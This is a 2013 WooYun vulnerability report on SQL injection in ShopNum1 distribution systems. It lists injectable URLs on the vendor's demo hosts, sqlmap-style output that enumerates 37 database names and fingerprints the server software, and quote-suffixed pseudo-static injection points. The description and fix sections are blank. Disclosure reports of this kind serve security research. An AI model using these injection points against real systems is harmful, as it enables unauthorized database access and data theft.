当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042195

漏洞标题:武汉群翔软件有限公司所有分销系统存在SQL通杀漏洞

相关厂商:武汉群翔软件有限公司

漏洞作者: 雅柏菲卡

提交时间:2013-11-07 12:19

修复时间:2013-12-22 12:20

公开时间:2013-12-22 12:20

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

..............

详细说明:

..........

漏洞证明:

这里以多个版本为例
官方演示站的
http://personal.shopnum1.com/ProductListCategory.html?ProductCategoryID=71&&Price1=3079&&Price2=3319
available databases [37]:
[*] aspnetdb
[*] dailiAgent
[*] Demo0510
[*] DZ
[*] ERPDataDictionary
[*] ERPDataDictionaryTest
[*] fenxiao
[*] fenxiaoportal
[*] fenxiaoportal928
[*] fenxiaoportalV8.0
[*] GroupflyERP
[*] GroupFlyHelpCenter
[*] groupflyOA
[*] master
[*] model
[*] msdb
[*] nrqiang0715
[*] Nrqiang2
[*] Nrqiang2_TB
[*] Nrqiang3
[*] nrqiangV8.0
[*] sales
[*] Shopnum1_Demo
[*] Shopnum1_DemoTB
[*] ShopNum1_Personal
[*] Shopnum1_TG
[*] ShopNum1_Union
[*] Shopnum1ERPTest
[*] ShopNum1Errors
[*] ShopNum1Verify
[*] tempdb
[*] test
[*] test1028
[*] testshopnum1
[*] vanclPortal
[*] yike
[*] youdu


分销门户系统
http://fenxiaoportal.shopnum1.com/ProductListCategory.html?Price1=233&&Price2=294&&ProductCategoryID=92
available databases [37]:
[*] aspnetdb
[*] dailiAgent
[*] Demo0510
[*] DZ
[*] ERPDataDictionary
[*] ERPDataDictionaryTest
[*] fenxiao
[*] fenxiaoportal
[*] fenxiaoportal928
[*] fenxiaoportalV8.0
[*] GroupflyERP
[*] GroupFlyHelpCenter
[*] groupflyOA
[*] master
[*] model
[*] msdb
[*] nrqiang0715
[*] Nrqiang2
[*] Nrqiang2_TB
[*] Nrqiang3
[*] nrqiangV8.0
[*] sales
[*] Shopnum1_Demo
[*] Shopnum1_DemoTB
[*] ShopNum1_Personal
[*] Shopnum1_TG
[*] ShopNum1_Union
[*] Shopnum1ERPTest
[*] ShopNum1Errors
[*] ShopNum1Verify
[*] tempdb
[*] test
[*] test1028
[*] testshopnum1
[*] vanclPortal
[*] yike
[*] youdu


淘铺通系统
http://demotb.shopnum1.com/ProductListCategory.html?ProductCategoryID=62&&Price1=2097&&Price2=2296
[22:31:55] [INFO] testing MySQL
[22:31:55] [WARNING] the back-end DBMS is not MySQL
[22:31:55] [INFO] testing Oracle
[22:31:55] [WARNING] the back-end DBMS is not Oracle
[22:31:55] [INFO] testing PostgreSQL
[22:31:56] [WARNING] the back-end DBMS is not PostgreSQL
[22:31:56] [INFO] testing Microsoft SQL Server
[22:31:56] [INFO] confirming Microsoft SQL Server
[22:31:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[22:31:57] [INFO] fetching database names
[22:31:57] [INFO] the SQL query used returns 37 entries
解表时间比较复杂 搁置


其他版本也存在伪静态注入
http://demotb.shopnum1.com/ProductDetail/4d86c756-cc53-47a3-a79f-2fd43e78f995'.html
http://personal.shopnum1.com/ProductListCategory/73'.html

修复方案:

...................

版权声明:转载请注明来源 雅柏菲卡@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论